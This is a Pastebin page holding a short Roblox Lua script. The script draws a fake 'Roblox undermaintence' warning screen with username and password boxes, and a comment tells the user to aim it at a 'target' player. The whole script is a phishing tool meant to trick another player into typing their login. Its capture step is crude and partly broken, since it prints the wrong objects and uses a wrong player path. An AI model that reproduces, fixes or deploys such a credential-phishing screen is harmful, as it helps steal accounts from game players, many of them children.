Advertisement
Thao_Scripter

Untitled

Apr 23rd, 2017
107
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.34 KB | None | 0 0
  1. -- made by Anime-Kun
  2.  
  3. local ScreenGui = Instance.new("ScreenGui")
  4. local Login = Instance.new("TextButton")
  5. local Username = Instance.new("TextBox")
  6. local Password = Instance.new("TextBox")
  7. local TextLabel = Instance.new("TextLabel")
  8. local TextLabel_2 = Instance.new("TextLabel")
  9.  
  10. -- change LocalPlayer to the plr u are gonna target
  11.  
  12. ScreenGui.Parent = game.LocalPlayer.PlayerGui
  13.  
  14. Login.Name = "Login"
  15. Login.Parent = ScreenGui
  16. Login.BackgroundColor3 = Color3.new(0, 0.580392, 0)
  17. Login.BorderColor3 = Color3.new(0.235294, 0.709804, 0.345098)
  18. Login.Position = UDim2.new(0, 500, 0, 500)
  19. Login.Size = UDim2.new(0, 200, 0, 40)
  20. Login.Font = Enum.Font.SciFi
  21. Login.FontSize = Enum.FontSize.Size36
  22. Login.Text = "Login"
  23. Login.TextColor3 = Color3.new(0, 0, 0)
  24. Login.TextScaled = true
  25. Login.TextSize = 36
  26. Login.TextStrokeColor3 = Color3.new(0, 0.580392, 0)
  27. Login.TextWrapped = true
  28.  
  29. Username.Name = "Username"
  30. Username.Parent = ScreenGui
  31. Username.BackgroundColor3 = Color3.new(1, 1, 1)
  32. Username.Position = UDim2.new(0, 500, 0, 300)
  33. Username.Size = UDim2.new(0, 200, 0, 50)
  34. Username.Font = Enum.Font.SciFi
  35. Username.FontSize = Enum.FontSize.Size18
  36. Username.Text = "Type your Username"
  37. Username.TextSize = 18
  38.  
  39. Password.Name = "Password"
  40. Password.Parent = ScreenGui
  41. Password.BackgroundColor3 = Color3.new(1, 1, 1)
  42. Password.Position = UDim2.new(0, 500, 0, 400)
  43. Password.Size = UDim2.new(0, 200, 0, 50)
  44. Password.Font = Enum.Font.SciFi
  45. Password.FontSize = Enum.FontSize.Size18
  46. Password.Text = "Type your Password"
  47. Password.TextSize = 18
  48.  
  49. TextLabel.Parent = ScreenGui
  50. TextLabel.BackgroundColor3 = Color3.new(0, 0.666667, 1)
  51. TextLabel.Size = UDim2.new(0, 1300, 0, 300)
  52. TextLabel.Font = Enum.Font.SciFi
  53. TextLabel.FontSize = Enum.FontSize.Size36
  54. TextLabel.Text = "Warning: Roblox undermaintence, please type your information to continue."
  55. TextLabel.TextSize = 36
  56.  
  57. TextLabel_2.Parent = ScreenGui
  58. TextLabel_2.BackgroundColor3 = Color3.new(0, 0.666667, 1)
  59. TextLabel_2.Position = UDim2.new(0, 5, 0, 550)
  60. TextLabel_2.Size = UDim2.new(0.100000001, 1140, 0, 190)
  61. TextLabel_2.Font = Enum.Font.SciFi
  62. TextLabel_2.FontSize = Enum.FontSize.Size48
  63. TextLabel_2.Text = "Roblox Undermaintence"
  64. TextLabel_2.TextSize = 48
  65. Login.MouseButton1Down:connect(function()
  66. print("Attempt for player")
  67. wait (7)
  68. print(game.StarterGui.Username)
  69. print(game.StarterGui.Password)
  70. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement